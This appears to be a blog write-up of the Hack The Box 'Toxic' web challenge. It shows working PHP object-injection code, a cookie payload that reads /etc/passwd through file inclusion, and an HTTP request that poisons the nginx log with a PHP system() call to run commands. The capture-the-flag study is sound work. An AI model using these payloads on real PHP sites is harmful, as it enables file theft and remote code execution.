Toxic - HTB - Challenges

Challenge's address: 139.59.189.189:32670



Checking out the source code attached to the challenge, it's easy to spot the call to unserialize. Following this blog post, https://snoopysecurity.github.io/web-application-security/2021/01/08/02_php_object_injection_exploitation-notes.html, we note that the only model defined in the challenge also calls the destruct magic method, which will help us in our exploitation.

The method includes files, so it will allow us to read, we have a LFI on our hands. 

First we must construct an appropriate PHPSESSID to exploit the unsafe unserialization. My code to achieve this was the following one:

<?php
class PageModel{
        public $file;
}
$obj = new PageModel();
$obj->file = "$argv[1]";
echo serialize($obj);
?>

which we can run to read, for example, /etc/passwd as follows:
php -f test.php /etc/passwd | base64

We substitute our cookie with the new one in a request to index.php and the LFI is complete


Now we need to achieve RCE, as the flag name is randomized and we cannot find it through our basic LFI.

We can use Log Poisoning, reading /var/log/nginx/access.log after submitting a request with a fake header.

Here I show my request to poison the log file so that it will display the flag on the next request (you can just as well submit this one twice, one to poison, one to exploit the LFI and read the flag) 

GET /index.php HTTP/1.1
Host: 139.59.189.189:32670
User-Agent: <?php echo system('cat ../flag...S'); ?> 
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://139.59.189.189:32670/
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQ



Merry hacking ;)


You'll only receive email when they publish something new.

More from emacab98
All posts